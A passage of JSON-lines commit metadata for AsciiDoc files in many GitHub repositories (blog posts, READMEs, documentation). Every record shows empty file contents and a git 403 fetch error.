2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da8036fa41e30f796a90ebb4fdd533db9f6ebdce","subject":"y2b create post Unboxing The World's Smallest Phone","message":"y2b create post Unboxing The World's Smallest Phone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-06-UnboxingTheWorldsSmallestPhone.adoc","new_file":"_posts\/2018-01-06-UnboxingTheWorldsSmallestPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1146b288b3a8630f6911cf895b0667ab669269b3","subject":"Update README","message":"Update README\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-entity,sdavids\/sdavids-commons-entity","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-entity.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35d6fba8c5b1fe8203086e60f77dde5a3a4d3bc8","subject":"Added readme","message":"Added readme\n","repos":"CyrilSahula\/REST-API-Doc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CyrilSahula\/REST-API-Doc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5eeb7bb3d037bb134f9286a751745ce91ed8dd4f","subject":"chore: add badges","message":"chore: add 
badges\n","repos":"gravitee-io\/gravitee.io,gravitee-io\/gravitee.io,Laurie-Maurer\/gravitee.io,gravitee-io\/gravitee.io,Laurie-Maurer\/gravitee.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Laurie-Maurer\/gravitee.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4771e4b60ed84b8e31cbad19ccea894473f6c29c","subject":"Add travisCI banner","message":"Add travisCI banner\n","repos":"mdenchev\/mui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdenchev\/mui.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"350fc94b70ff1d76cc97043231c069db15bc6e99","subject":"Update README","message":"Update README\n","repos":"pjanouch\/sdtui,pjanouch\/sdtui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sdtui.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"1e0877d6f2b3aa777286759c648ff59ed2744df9","subject":"Update 2015-09-17-first-commit.adoc","message":"Update 2015-09-17-first-commit.adoc","repos":"popurax\/popurax.github.io,popurax\/popurax.github.io,popurax\/popurax.github.io","old_file":"_posts\/2015-09-17-first-commit.adoc","new_file":"_posts\/2015-09-17-first-commit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/popurax\/popurax.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7ed23d28700a1c4a8425094013fc9ef5e95f32d","subject":"Update 2015-10-20-Hash-in-Java.adoc","message":"Update 2015-10-20-Hash-in-Java.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_file":"_posts\/2015-10-20-Hash-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"deb415d37b4acd643fe8c729d3018450c788d05d","subject":"Update 2016-04-11-Another-post.adoc","message":"Update 2016-04-11-Another-post.adoc","repos":"RussellSnyder\/hubpress-test,RussellSnyder\/hubpress-test,RussellSnyder\/hubpress-test,RussellSnyder\/hubpress-test","old_file":"_posts\/2016-04-11-Another-post.adoc","new_file":"_posts\/2016-04-11-Another-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RussellSnyder\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9233eeb08d4feb97d89ecc58c7571d8f381a6bf","subject":"Update 201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","message":"Update 201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","new_file":"_posts\/201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68e2ad0c97b38597b41a1be1ffd1997e1eee2a0c","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6d87822a26c28ce8333a1860013453667571fe9","subject":"y2b create post Giving Up My Smartphone...","message":"y2b create post Giving Up My Smartphone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-25-Giving-Up-My-Smartphone.adoc","new_file":"_posts\/2016-06-25-Giving-Up-My-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36cef79be020b1d7a385fb9fc8ccfe18c7a8a214","subject":"Update 2016-08-09-Type-Script-para-mancos.adoc","message":"Update 2016-08-09-Type-Script-para-mancos.adoc","repos":"josegomezr\/blog,josegomezr\/blog,josegomezr\/blog,josegomezr\/blog,josegomezr\/blog","old_file":"_posts\/2016-08-09-Type-Script-para-mancos.adoc","new_file":"_posts\/2016-08-09-Type-Script-para-mancos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/josegomezr\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74d12b85b070ac1e2a70c081401f3b9192180488","subject":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","message":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"335131c1d13f80caf1dd326758e154317283c780","subject":"update release notes","message":"update release notes\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81f679fce64dae78e54dfef0dfa49fe226ad73e2","subject":"Update 
2015-06-11-WalkingMapKyoto.adoc","message":"Update 2015-06-11-WalkingMapKyoto.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-11-WalkingMapKyoto.adoc","new_file":"_posts\/2015-06-11-WalkingMapKyoto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af661c56d7dbe8bcc9458a8ac4ebf11e12443dcf","subject":"Update 2015-09-25-Blog-simplified.adoc","message":"Update 2015-09-25-Blog-simplified.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Blog-simplified.adoc","new_file":"_posts\/2015-09-25-Blog-simplified.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db869ad8c1f2ff92bc49987ccd666e625793c419","subject":"Update 2017-01-06-ppap-javascript.adoc","message":"Update 2017-01-06-ppap-javascript.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-ppap-javascript.adoc","new_file":"_posts\/2017-01-06-ppap-javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"502b88aaaec33fde8ced9e3e289c6f71765f704d","subject":"Update 2017-04-03-Engineering.adoc","message":"Update 2017-04-03-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-03-Engineering.adoc","new_file":"_posts\/2017-04-03-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ae21e5985632e8edaeb7ef604d07c72795fdd0d","subject":"Update 2018-01-17-Neo4j-Causal-Cluster-Docker-Quickstart-Open-Source-Version.adoc","message":"Update 2018-01-17-Neo4j-Causal-Cluster-Docker-Quickstart-Open-Source-Version.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2018-01-17-Neo4j-Causal-Cluster-Docker-Quickstart-Open-Source-Version.adoc","new_file":"_posts\/2018-01-17-Neo4j-Causal-Cluster-Docker-Quickstart-Open-Source-Version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4afcf5fbd51b13a23935bc2aadcbbc7c5ad8d2a","subject":"Added 3.2.1.Final news","message":"Added 3.2.1.Final news\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-06-02-forge-3.2.1.final.asciidoc","new_file":"news\/2016-06-02-forge-3.2.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} 
{"commit":"5236b89a858576e1e938f618618d53753b7fdb20","subject":"Update 2015-11-08-Ihr-seid-gefragt.adoc","message":"Update 2015-11-08-Ihr-seid-gefragt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-11-08-Ihr-seid-gefragt.adoc","new_file":"_posts\/2015-11-08-Ihr-seid-gefragt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"802539d5969b4a62223aa3ab07972057351cb8fc","subject":"Blog post announcing project lead change","message":"Blog post announcing project lead change\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2017-04-26-Debezium-evolving.adoc","new_file":"blog\/2017-04-26-Debezium-evolving.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4eff82053e69ff6b1471f2c228b55a02ddf94d02","subject":"Update technical-manual.adoc","message":"Update technical-manual.adoc","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"4ec7ee23c3e4771e637248b282305bcc1e02eac6","subject":"Python note - Generating SSH key pairs","message":"Python note - Generating SSH key pairs\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0c6ba20fcf2de50b4d2c837d5ead66bfa9bec5b5","subject":"Updated README","message":"Updated README\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"compiler\/README.asciidoc","new_file":"compiler\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f91a92ba580988bf84ebebe78aca75abf82360e7","subject":"Import release notes for Groovy 2.0","message":"Import release notes for Groovy 
2.0\n","repos":"benignbala\/groovy-website,rahulsom\/sdkman-website,groovy\/groovy-website,dmesu\/sdkman-website,rahulsom\/sdkman-website,marcoVermeulen\/groovy-website,benignbala\/groovy-website,marc0der\/groovy-website,kevintanhongann\/groovy-website,groovy\/groovy-website,sdkman\/sdkman-website,m-ullrich\/groovy-website,dmesu\/sdkman-website,webkaz\/groovy-website,PascalSchumacher\/groovy-website,kevintanhongann\/groovy-website,marcoVermeulen\/groovy-website,webkaz\/groovy-website,marc0der\/groovy-website,sdkman\/sdkman-website","old_file":"site\/src\/site\/releasenotes\/groovy-2.0.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-2.0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahulsom\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51f9ff8e78802787ce91fd3d24d928d77bb206eb","subject":"Update 2019-02-01-g-R-P-C-Java-Ruby.adoc","message":"Update 2019-02-01-g-R-P-C-Java-Ruby.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-01-g-R-P-C-Java-Ruby.adoc","new_file":"_posts\/2019-02-01-g-R-P-C-Java-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df9794b11e5d90b7374a13cd35a12cb2b5a8eedb","subject":"Create BasicInfo.adoc","message":"Create BasicInfo.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/tutorials\/BasicInfo.adoc","new_file":"wiki\/tutorials\/BasicInfo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0490b34dddfb1ca4dcb9255c5fc94b5cc4cfb2e","subject":"[docs] An instruction to add repaired disk back to cluster","message":"[docs] An instruction to add repaired disk back to cluster\n\nChange-Id: I4d268f62455a22899f3bf38a4bf4ad64db048457\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12329\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4d684696ecf4a8f28126ec5b994a3d3e2afe8563","subject":"add infinispan doc","message":"add infinispan doc\n","repos":"jbosschina\/cluster,jbosschina\/cluster,jbosschina\/cluster","old_file":"docs\/infinispan.asciidoc","new_file":"docs\/infinispan.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/cluster.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"2fe0737bc8c6f86a515441479460985275b0a987","subject":"NMS-6634: Documentation DnsMonitor","message":"NMS-6634: Documentation DnsMonitor\n\n- Created complete parameter description\n- Created example testing DNS lookup for A record against www.google.com\n","repos":"rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,tdefilip\/opennms,rdkgit\/opennms,aihua\/opennms,rdkgit\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/DnsMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/DnsMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tdefilip\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b4153ddc0a3b9ec04dac03d10671d5da277a58c1","subject":"Bug Hibernate","message":"Bug Hibernate\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/JPA.adoc","new_file":"Best practices\/JPA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdfb32ae0c668ba532f762b83c8f674b47992b6b","subject":"Renamed '_posts\/2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc' to '_posts\/2017-11-14-Neo4j-330-is-out-but-where-are-the-open-source-enterprise-binaries.adoc'","message":"Renamed '_posts\/2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc' to '_posts\/2017-11-14-Neo4j-330-is-out-but-where-are-the-open-source-enterprise-binaries.adoc'","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2017-11-14-Neo4j-330-is-out-but-where-are-the-open-source-enterprise-binaries.adoc","new_file":"_posts\/2017-11-14-Neo4j-330-is-out-but-where-are-the-open-source-enterprise-binaries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4449877aeff9a7d504b447644b5607d18afff9fd","subject":"y2b create post The Best Wireless Headphones You Can Buy Right Now","message":"y2b create post The Best Wireless Headphones You Can Buy Right 
Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-02-The%20Best%20Wireless%20Headphones%20You%20Can%20Buy%20Right%20Now.adoc","new_file":"_posts\/2018-02-02-The%20Best%20Wireless%20Headphones%20You%20Can%20Buy%20Right%20Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"493e46d4cbe5e9d483ce4a9f834bad560da9a65a","subject":"y2b create post Eton Mobius for iPhone GIVEAWAY!","message":"y2b create post Eton Mobius for iPhone GIVEAWAY!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-28-Eton-Mobius-for-iPhone-GIVEAWAY.adoc","new_file":"_posts\/2011-11-28-Eton-Mobius-for-iPhone-GIVEAWAY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7369d3fd566dd52a2dfdcfb3a86ccece04fde150","subject":"Update 2015-04-15-Quest-ce-que-lAPM.adoc","message":"Update 2015-04-15-Quest-ce-que-lAPM.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-Quest-ce-que-lAPM.adoc","new_file":"_posts\/2015-04-15-Quest-ce-que-lAPM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a01b5589a91be94f37b6c7acb656cf2058489e7e","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f91813bb9a89a8c6baf80ce5e3c547dfc90d325","subject":"Deleted 2016-09-innovation-Engineer-Aruaru.adoc","message":"Deleted 2016-09-innovation-Engineer-Aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-09-innovation-Engineer-Aruaru.adoc","new_file":"2016-09-innovation-Engineer-Aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb7e8b48847de2f273d546c50d0e2e5b2c7fedfc","subject":"Update 2017-10-28-Your-Blog-title2.adoc","message":"Update 
2017-10-28-Your-Blog-title2.adoc","repos":"Jason2013\/hubpress,Jason2013\/hubpress,Jason2013\/hubpress,Jason2013\/hubpress","old_file":"_posts\/2017-10-28-Your-Blog-title2.adoc","new_file":"_posts\/2017-10-28-Your-Blog-title2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Jason2013\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50e7979e7cdf792aadad6c271357371bc9e35378","subject":"add a more detailed spec on the search itf","message":"add a more detailed spec on the search itf\n","repos":"rillbert\/giblish,rillbert\/giblish,rillbert\/giblish","old_file":"docs\/search_spec.adoc","new_file":"docs\/search_spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rillbert\/giblish.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3d7caf419b7e9539549b96ebd1dc6baa3d89c00","subject":"Update 2014-12-29-A-resume-and-a-code-example-in-one.adoc","message":"Update 2014-12-29-A-resume-and-a-code-example-in-one.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-12-29-A-resume-and-a-code-example-in-one.adoc","new_file":"_posts\/2014-12-29-A-resume-and-a-code-example-in-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47787c037b2dad23cb760fedd04157477965485c","subject":"Update 2015-10-01-Story-of-my-Life.adoc","message":"Update 2015-10-01-Story-of-my-Life.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-01-Story-of-my-Life.adoc","new_file":"_posts\/2015-10-01-Story-of-my-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5a0b36b79475fc3e0a768f2453539bccc5cf9e2","subject":"updated required repos for OCP3.4 and OSP10","message":"updated required repos for OCP3.4 and OSP10\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"315415c36561c019cfcfb06f3cb8ba388bbd4cee","subject":"Create README.adoc","message":"Create README.adoc","repos":"arturmon\/mycontroller,Dietmar-Franken\/mycontroller,Thar0l\/mycontroller,mycontroller-org\/mycontroller,arturmon\/mycontroller,Thar0l\/mycontroller,Thar0l\/mycontroller,Dietmar-Franken\/mycontroller,arturmon\/mycontroller,Thar0l\/mycontroller,arturmon\/mycontroller,Dietmar-Franken\/mycontroller,Dietmar-Franken\/mycontroller,pgh70\/mycontroller","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arturmon\/mycontroller.git\/': The requested URL returned error: 
